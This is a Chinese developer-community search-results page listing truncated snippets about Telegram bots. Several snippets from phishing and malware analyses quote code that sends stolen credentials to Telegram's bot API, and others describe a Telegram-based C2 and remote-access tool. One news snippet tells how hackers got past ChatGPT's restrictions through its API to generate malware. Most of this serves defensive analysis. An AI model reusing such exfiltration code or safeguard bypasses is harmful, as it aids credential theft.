C#如何使用Telegram API (非Bot API)从渠道/联系人获取消息 - 腾讯云开发者社区

文章/答案/技术大牛

发布

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

Telegram Bot API的开放性为此类攻击提供了技术基础。任何开发者均可注册Bot并获取唯一token，通过简单HTTP请求实现消息收发。...Bot后端通常为Python脚本，使用python-telegram-bot库：from telegram import Updatefrom telegram.ext import Application...“Approve”；会话接管：获取Refresh Token后，攻击者通过Graph API访问邮箱、OneDrive，并向联系人发送新钓鱼邮件。...;)企业亦可部署DNS防火墙，阻止对api.telegram.org的非授权访问（除IT管理用途外）。...6 结论Telegram机器人在欧洲凭证钓鱼中的应用，标志着攻击模式从“静态投递”向“动态交互”的演进。其通过Bot API实现数据实时回传与操作指令下发，显著缩短攻击窗口并提升成功率。

1681 0

命令控制之Telegram

Telegram的Bots是Tegegram内置的第三方应用，通信方式为HTTPS，功能类似于聊天机器人，它可以获取定制化的信息，结合其他的服务使用，同时可以创建自定义的工具。...之后访问https://telegram.me/botfather，添加BotFather为联系人(BotFather用来创建和管理自定义bot) ?...提取文字消息使用glance()可以从接收的消息中提取一个元组(content_type，chat_type，chat_id)，当下： content_type包括text, audio, document...以上介绍了Bot API中发送、接收文本消息和上传、下载文件的功能，剩下只需要将功能拼接，添加命令解析，就可以实现一个简易的C2 Server POC bt2框架项目介绍 Bt2是一个使用python...编写开发的C2框架，它使用了telegram提供的基础设施和功能丰富的bot api，稍微改变了其通信平台的用途，使其可以充当c&c。

4K2 0

您找到你想要的搜索结果了吗？

是的

没有找到

简化通知基础设施：开源的消息通知服务 | 开源专题 No.41

主要功能有：为所有消息提供商 (应用内、电子邮件、短信、推送和聊天) 提供单一 API 管理多个渠道上的通知非常容易配备 CMS 进行高级布局和设计管理内置保护机制以防止变量丢失 (即将推出) 安装和集成简单方便...python-telegram-bot/python-telegram-bot[2] Stars: 22.9k License: GPL-3.0 这个项目是一个提供纯 Python 异步接口的 Telegram...Bot API 库。...该库支持 Telegram Bot API 6.8 的所有类型和方法。...使用 ntfy，您可以通过脚本从任何计算机向手机或桌面发送推送通知，而无需注册或支付费用。如果您想要运行自己的实例，则可以轻松地做到这一点，因为 ntfy 是开源项目。

1.5K2 0

多通道钓鱼攻击的演化与行为安全防御模型研究

摘要近年来，网络钓鱼攻击呈现出从单一邮件渠道向全工作场所通信平台扩散的显著趋势。...攻击者利用这些平台的 API 或 Webhook 功能，自动化发送消息。...例如，通过 Microsoft Graph API 向 Teams 用户推送伪造的“IT 安全警报”；或利用 Telegram Bot 向财务人员发送“CEO 指令”要求紧急转账。...该模型不关注单条消息内容，而是分析：交互频率与时序：某供应商是否突然频繁联系？渠道偏好突变：长期使用邮件的同事为何改用 Telegram？请求类型异常：HR 是否会直接索要 MFA 令牌？...4 技术实现：跨平台行为分析原型以下为简化版 Python 原型，展示如何从 Slack 与 Teams 日志中提取特征并检测异常请求。

1571 0

telegram-1：向tg的机器人群推送消息

Telegram Bot的创建简单，API全面且免费，适合国际业务。业务需求：最近需要将自动客户端的自动打包结果的二维码和下载地址推送到tg机器人群，需要了解。...(2).创建一个接受机器人消息的群组程序是使用chat_id进行消息推送。我们需要先获取chat_id。建一个群，把这个机器人加入这个群，并发一条消息，必须是“/”开头。...浏览器访问下述url获取这个群组的chat_id： https://api.telegram.org/bot5049056695:AAFfyxCap2I0SZazC0DJ7WPw5oBz9oZcl7A/...getUpdates 在返回值中找到这个群组的chat_id，机器人会向这个chat_id发送消息： -750599670 (3).python向bot推送消息的demo 1.相关准备去官网查看下api...: https://core.telegram.org/bots/api 需要用到 python-telegram-bot 库。

11.8K3 0

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

本文聚焦于2025年曝光的一类以Telegram为核心载体的高级钓鱼活动，系统剖析其如何利用Bot API、公开频道、WebView嵌入及消息自毁等原生功能，实现凭据窃取、会话劫持与恶意分发的闭环。...此类攻击的核心挑战在于其“合法性掩护”：所有通信均经由telegram.org域名完成，符合SPF/DKIM/DMARC标准；Bot API调用使用HTTPS加密；消息支持自毁与私聊加密，极大增加取证难度...更重要的是，传统安全设备难以区分正常用户使用Telegram与恶意Bot数据回传之间的流量差异。...3.1 终端行为监控：识别异常Telegram进程企业EDR应监控以下行为：非授权用户启动Telegram Desktop；Telegram进程发起大量POST请求至api.telegram.org/bot...6 结语本文系统分析了Telegram基础设施在现代钓鱼攻击中的滥用模式，阐明其如何通过Bot API、频道分发与WebView嵌入实现端到端攻击闭环。

2301 0

盘点 | 聊天机器人的发展状况与分类

Step 1 - 在Telegram上注册账号通过 BotFather创建Bot。 ?...Step 2 - 在Botframework上注册账号创建一个Bot, 同时下载Botframework提供的SDK／Sample( Node.js|C#)，连接到Telegram。 ?...Step 4 - 服务发布 Telegram是一个神奇的IM，它提供了聊天机器人应用商店。使用Telegram IM的用户可以快速体验和使用这些Bot。 ?...如何判断一个模型的好坏在使用LSTM训练基于生成的模型的过程中，一个很大的挑战就是没有自动化的量化的标准：除了人工的和模型对话意外，不确定模型间的好坏。...从社交网络上对接到服务需要走InboundMessage, 从OutboundMessage中异步获取回复。

3.1K8 0

低门槛钓鱼工具包的工业化趋势与防御对策研究

2.5 凭据回传与二次利用捕获的凭据通过Telegram Bot或Discord Webhook实时推送：import requestsdef log_to_telegram(creds):bot_token...= "YOUR_BOT_TOKEN"chat_id = "YOUR_CHAT_ID"msg = f"New credential: {creds}"url = f"https://api.telegram.org...3 攻击效能与影响范围的量化分析通过对2024年Q2至2025年Q1期间捕获的127个活跃PhaaS套件进行分析，得出以下结论：部署时间缩短：从获取工具包到上线钓鱼站点平均仅需8.3分钟（传统方式需4–...即使用户在伪造站点输入，密钥也不会响应非注册域名的挑战。企业应优先在高管、IT管理员等高价值账户强制启用硬件密钥。...样本中提取IoC：页面HTML的SHA256哈希使用的JS库版本（如jQuery 3.6.0 + custom obfuscator）C2回调的Telegram Bot Token片段短生命周期域名的注册模式

2211 0

钓鱼团伙用Telegram机器人“接单”：欧洲凭证窃取进入“实时客服”时代

攻击者利用Telegram开放的Bot API，将钓鱼活动模块化、自动化、甚至“服务化”——从模板分发、数据回传到会话接管，全部通过聊天界面完成，宛如一个地下“钓鱼SaaS平台”。..."时间: " . date('Y-m-d H:i:s');// 调用Telegram API发送消息file_get_contents("https://api.telegram.org/bot{$bot_token...开放API成双刃剑Telegram之所以成为钓鱼团伙的首选平台，源于其三大特性：Bot API完全开放且文档完善：开发者可轻松创建具备消息推送、按钮交互、文件传输能力的机器人；端到端加密非默认启用：普通群组和频道通信未加密...、Zscaler）阻止对 core.telegram.org 和 api.telegram.org 的非业务访问。...“我们不能只盯着Telegram，而要关注任何支持自动化消息交互的平台。”芦笛提醒，“防御的核心，是识别‘异常数据流向’，而非特定应用。”七、SOC如何应对？

541 0

钓鱼攻击中窃取数据的流转路径与防御机制研究

本文基于近期对钓鱼基础设施、数据外传通道及暗网交易市场的实证分析，系统梳理了从凭证窃取到多阶段滥用的完整链条。...因此，2020年后，此类方式使用率显著下降。2.2 Telegram Bot 成为主流回传通道当前绝大多数钓鱼页面嵌入Telegram Bot API实现即时数据推送。...攻击者首先在Telegram上创建Bot并获取token，随后在钓鱼脚本中调用Telegram的sendMessage接口。...chat_id=${chatId}&text=${message}`;await fetch(url);}该方案优势显著：Telegram服务器分布全球，抗封锁能力强；Bot通信无需暴露真实IP；消息可自动转发至多个频道或私人群组...):# 调用Microsoft Graph API 强制登出用户token = get_access_token() # 获取管理员令牌url = f"https://graph.microsoft.com

1371 0

使用n8n搭建服务器监控系统：从Webhook到Telegram告警的完整实现

本文介绍如何使用n8n工作流自动化工具搭建一个完整的服务器监控系统，实现从数据采集、告警判断到Telegram消息推送的全流程自动化，整个方案无需编写复杂代码，配置完成后可实现7x24小时实时监控。...Bot（用于接收告警消息）支持HTTPS的域名（用于Webhook接收）配置信息获取：n8n域名：替换your-n8n-domain.com为你的n8n实际部署域名认证Token：使用openssl...rand -hex 32命令生成强随机字符串Telegram Chat ID：与Bot对话后访问 https://api.telegram.org/botBOT_TOKEN>/getUpdates...发送告警到Telegram当检测到告警时，通过Telegram Bot发送通知消息：执行以下命令进行安装/配置：从配置可以看到，Telegram节点的关键设置：Resource: MessageOperation...告警效果展示具体操作如下：Telegram Bot成功收到告警消息，显示内容包括：服务器名称和监控时间系统资源使用情况（CPU、内存、磁盘、负载、运行时间）网络流量数据（入站/出站）告警状态和具体告警项消息格式清晰

1.9K10 0

BotSharp：又一个.Net重磅AI开源项目，.Net在AI领域开始崛起！

下面介绍一个开源项目，面向AI Bot平台构建者的开源机器学习框架：BotSharp，它已经为.NET开发人员提供了使用BotSharp AI BOT platform Builder构建CaaP的整套工具包...内容集成：抽象化的标准富内容数据结构，可以与 Facebook Messenger、Slack 和 Telegram 等流行的消息渠道集成。...C# 编写，运行在 .NET Core 上，支持跨平台部署。...使用 C# 机器学习算法：直接在 C# 中采用机器学习算法，利用 C# 的类型语言特性，系统级重构代码时更加方便。 05 插件系统采用组件化设计，使得核心功能保持精简，业务功能通过外部组件实现。...消息/渠道：支持多种消息渠道，如 ChatHub、Meta Messenger、Twilio、Telegram、微信等。知识检索：提供知识库和向量数据库插件。

5750 0

Telegram小程序钓鱼攻击机制与防御策略研究

这种“先上线、后举报”的治理模式虽有利于生态快速扩张，却也为恶意行为者提供了低门槛攻击渠道。...Mini App的启动流程如下：用户点击消息中的“Launch”按钮或Bot菜单项；Telegram客户端加载开发者预设的HTTPS URL；页面通过window.Telegram.WebApp对象与宿主环境通信...从安全角度看，Telegram Mini Apps的设计遵循以下原则：沙箱隔离：Mini App运行于受限的WebView中，无法直接调用系统API；数据最小化：仅在用户明确授权后，才通过initData...他们通过以下方式触达目标用户：向特定频道（如UFC粉丝群）成员发送私信；在相关话题评论区发布带Bot链接的消息；利用僵尸账号批量转发“限时免费领取”通知。消息内容常包含紧迫性话术（如“仅剩23份！”）...关键伪造点包括：使用与官方Bot相似的用户名（如@portal_market vs @portals）；在Mini App信息页中填写虚假的“官方频道”链接；模拟Telegram原生加载动画，增强可信度

1631 0

TelegramRAT：一款功能强大的基于Telegram的远程通信访问控制工具

功能介绍 1、直接在Bot中执行Shell命令； 2、支持从客户端下载文件； 3、支持获取客户端系统信息； 4、支持获取客户端地理位置信息； 5、支持捕捉屏幕截图； 6、支持获取URL（从URL下载文件...| 捕捉屏幕截图 info | 获取系统信息 location | 获取目标位置 get url | 从URL下载文件（...提供直接URL）工具使用 1、打开Telegram并搜索https://t.me/BotFather； 2、创建Bot并获取API_TOKEN； 3、现在搜索https://t.me/chatIDrobot...并获取chat_id； 4、打开client.py，定位到第16行和第17行，并在其中写入API_TOKEN和chat_id； 5、在Windows系统中运行python client.py或在Linux...中运行python3 client.py； 6、打开你刚刚创建的Bot，并直接在消息输入框中输入并发送命令即可；许可证协议本项目的开发与发布遵循Apache-2.0开源许可证协议。

8463 0

【技术分享】使用电报API免费创建个人通知系统

今天，我们正在探索 Telegram 的 API。Telegram 具有一个非常简单的 API，几乎可以自动化任何事情——您甚至可以使用它来向您发送消息。为什么需要个人通知系统？...为此，需要将消息从机器人发送给您。创建机器人是通过向名为 BotFather 的现有机器人发出命令来实现的。.../startchat_id 在这里，你可以使用 curl 或任何你想要的客户端;你只需要向这个 url 发出一个 GET 请求： https://api.telegram.org/bot[TOKEN]/...getUpdates 替换为之前从 BotFather 获取的令牌，但请记住将机器人部分保留在令牌之前的 URL 中。...GET 请求发送消息最终，向聊天发送消息就像向以下 URL 发出 GET 请求一样简单： https://api.telegram.org/bot[TOKEN]/sendMessage?

6.4K6 0

面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

三、钓鱼工具包技术分析3.1 样本获取与环境搭建研究人员通过监控暗网论坛及Telegram频道，获取了该工具包的压缩包（SHA-256: a1b2c3...）。...更关键的是，Telegram Bot作为数据回传通道，具有高隐蔽性与实时性：// telegram.phpfunction send_to_telegram($user, $pass, $ip) {$bot_token...\nUser: $user\nPass: $pass\nIP: $ip";$url = "https://api.telegram.org/bot$bot_token/sendMessage?...4.2 网络层IP地理围栏与Bot通信阻断在企业边界防火墙或代理服务器部署规则，阻断非意大利IP对内部Aruba相关服务的异常访问，并监控出站Telegram通信：# network_monitor.py...API调用if re.search(r'api\.telegram\.org/bot\d+:[A-Za-z0-9_-]+/sendMessage', packet.payload):if not whitelist.contains

1461 0

黑客靠ChatGPT赚钱：每100次收费37元，还能修改恶意软件代码

白交发自凹非寺量子位 | 公众号 QbitAI 现在，黑客已经靠ChatGPT赚钱了—— 机器人即服务RaaS，前20次免费使用，之后每100次收取5.5美元（约37元）。...“机器人即服务” 据相关安全公司消息，黑客们首先找到一种可以绕过OpenAI限制的方法，通过使用ChatGPT API集成到他们的一个应用程序中。...事实上证明，相较于网页端，API版本反而不会对恶意内容进行强制限制。其中有个论坛的用户，就将其与Telegram消息APP结合起来，以此来出售服务Telegram bot。...△Telegram bot生成的钓鱼软件，图源：Enlarge △Telegram bot生成的恶意软件，图源：Enlarge（下同）与此同时，其他黑客也在发布一些可以免费生成恶意内容的代码。...一种是Web用户界面，一种是API，将OpenAI的模型和数据跟你自己的应用界面配套使用。比如这些都是合法认证的APP。此前，黑客们使用Web端ChatGPT生成恶意软件和钓鱼邮件很容易。

8642 0

鱼叉钓鱼攻击中DarkCloud窃密木马的技术剖析与防御对策

数据打包与外传：将上述信息压缩加密后，通过SMTP（含SSL）、Telegram Bot API、FTP或自建PHP Web Panel四种方式外传。...本次观测样本使用SMTP与Telegram双通道冗余传输，确保至少一条路径可达。...异常外连识别：建立基线，对非业务时段、非常规目的地（如Telegram IP段、东欧SMTP服务器）的外传连接进行拦截。...Telegram API识别：通过TLS指纹或HTTP User-Agent（如TelegramBot (like TwitterBot)）识别恶意Bot通信。...网络代理拦截了对Telegram Bot API的POST请求（外传阻断）。误报测试：合法VB6应用（如旧版内部工具）未触发告警，证明策略具备可用性。

2271 0

利用Telegram搭建RSS中文订阅机器人（rssbot）

前言我们很多人喜欢一些网站或者博客，有时候会错过好东西或者福利，今天介绍下如何用 Telegram 做一个自己的 RSS 订阅机器人，这样我们可以非常方便的通过它来实现在 Telegram 里订阅网站并快速推送...教程 1、申请 Bot 打开 Telegram，搜索 @BotFather，发送 /newbot ，按要求完成 Bot 机器人申请。...2、搭建 rssbot 这里直接使用开源的中文 Telegram RSS 机器人就行，项目地址：https://github.com/iovxw/rssbot 下面将介绍预编译版本的使用方法，执行如下命令.../null 2>&1 & 其中，第三行命令的 TELEGRAM-BOT-TOKEN 就是你创建的 Telegram 机器人的 API TOKEN。.../rssbot DATAFILE TELEGRAM-BOT-TOKEN > /dev/null 2>&1 & # 方法2 使用setsid命令 setsid .

8K4 1

关于 wechaty 使用一周的感受与教程

关于 wechaty 使用一周的感受与教程你被骗了！！...只有标题和这一句话使用中文，其他的都是英文，请手动点击翻译 Type: Individual user usage mode: Store messages and manage messages How...WebHook（Dingding，Telegram） // >>> config.yaml <<< BOT: CHAT: off Wechaty: WECHATY_PUPPET: wechaty-puppet-xp...%s", viper.GetString("info"), message.From().Name(), message.Text(), reply) } } else { // 如果不是群消息...，那就是联系人消息 if viper.GetString("CHAT") !

2.2K2 0

点击加载更多

Telegram机器人在欧洲凭证钓鱼中的协同机制与防御路径

命令控制之Telegram

简化通知基础设施：开源的消息通知服务 | 开源专题 No.41

多通道钓鱼攻击的演化与行为安全防御模型研究

telegram-1：向tg的机器人群推送消息

Telegram基础设施在钓鱼攻击中的滥用机制与防御对策研究

盘点 | 聊天机器人的发展状况与分类

低门槛钓鱼工具包的工业化趋势与防御对策研究

钓鱼团伙用Telegram机器人“接单”：欧洲凭证窃取进入“实时客服”时代

钓鱼攻击中窃取数据的流转路径与防御机制研究

使用n8n搭建服务器监控系统：从Webhook到Telegram告警的完整实现

BotSharp：又一个.Net重磅AI开源项目，.Net在AI领域开始崛起！

Telegram小程序钓鱼攻击机制与防御策略研究

TelegramRAT：一款功能强大的基于Telegram的远程通信访问控制工具

【技术分享】使用电报API免费创建个人通知系统

面向意大利公共服务的新型钓鱼工具包分析与防御机制研究

黑客靠ChatGPT赚钱：每100次收费37元，还能修改恶意软件代码

鱼叉钓鱼攻击中DarkCloud窃密木马的技术剖析与防御对策

利用Telegram搭建RSS中文订阅机器人（rssbot）

关于 wechaty 使用一周的感受与教程

相关资讯

热门标签

活动推荐

运营活动

社区

活动

圈层

关于

腾讯云开发者

热门产品

热门推荐

更多推荐